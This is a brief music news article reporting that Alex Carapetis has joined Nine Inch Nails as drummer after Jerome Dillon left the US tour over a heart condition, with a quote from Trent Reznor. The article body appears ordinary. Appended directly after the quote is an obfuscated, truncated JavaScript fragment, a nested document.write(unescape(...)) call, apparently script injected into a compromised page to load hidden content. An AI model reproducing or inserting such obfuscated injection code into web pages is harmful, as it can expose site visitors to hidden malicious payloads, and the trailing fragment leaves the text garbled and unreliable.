Nine Inch Nails have announced their new drummer.
Australian sticksman Alex Carapetis has been named as the newest addition to the group, after Jerome Dillon was forced to quit their current US tour in order to seek treatment for an unspecified heart condition.
Carapetis played his first show with the band on Friday at the Chicago Allstate Arena (October 14), replacing temporary stand-in Josh Freese.
Freese filled in for Dillon at Nine Inch Nails' shows in Utah (October 4) and Denver (October 5).
As previously reported, Dillon was hospitalised for the second time following the band's show in Sacramento's Arco Arena last month (September 28).
The band were also forced to cut short the opening show of their current US tour in San Diego on September 16 when Dillon suffered another medical emergency.
The drummer was unable to continue with the rest of the show and it was postponed until November 20. The next night's gig in Tucson, Arizona was also cancelled.
New drummer Carapetis has previously played with Nikka Costa, Lenny Kravitz and Delta Goodrem.
Speaking about Carapetis on Nine Inch Nails' official website nin.com, Trent Reznor said: "Alex is doing great and fitting in well. Josh Freese helped us out by playing the Salt Lake City and Denver shows as a substitute, while Alex Carapetis took over in Chicago. I can't begin to tell you what a difficult job it is to replace your drummer in this band, and these guys have truly risen to the high-pressure situation that it is."document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
